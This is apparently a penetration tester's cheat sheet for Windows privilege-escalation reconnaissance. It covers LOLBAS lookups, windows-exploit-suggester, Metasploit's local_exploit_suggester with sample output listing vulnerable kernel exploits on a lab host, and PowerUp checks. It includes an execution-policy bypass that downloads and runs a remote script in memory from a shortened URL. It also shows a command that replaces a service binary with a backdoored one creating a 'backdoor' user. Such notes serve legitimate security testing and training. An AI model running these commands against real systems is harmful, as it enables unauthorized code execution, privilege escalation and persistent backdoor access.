Automated Recon

Binaries Information

https://lolbas-project.github.io/#
python3 gtfo -e Certutil.exe


Local Exploit Suggester

# You can feed syteminfo output to windows-exploit-suggester
./windows-exploit-suggester.py --update
./windows-exploit-suggester.py --database 2019-02-19-mssb.xls --systeminfo /home/xxx/Documents/Galactic/systeminfo.txt

# Metasploit also has a module
 > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module on
   SHOWDESCRIPTION  false            yes       Displays a detailed description for the available exploits

msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 29 exploit checks are being tried...
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed


PowerSploit / PowerUp

# Copy PowerUp.ps1 to Powershell bypass Execution policy
powershell -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# You can also use SharUp.exe
# Need to be compiled, but newer tool.
msf shell> powershell.exe -exec bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}
C:> powershell.exe -nop -exec bypass
PS C:\> Import-Module PowerUp.ps1
PS C:\> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

# Full in memory
C:\> powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks”
# If a binary seems to be exploitable you can backup real service and create a backdored one
PS C:\> Write-ServiceEXE -ServiceName CustomSVC -UserName backdoor -Password password123 -Verbose

# Restore the real service
PS C:\> Restore-ServiceEXE -ServiceName CustomSVC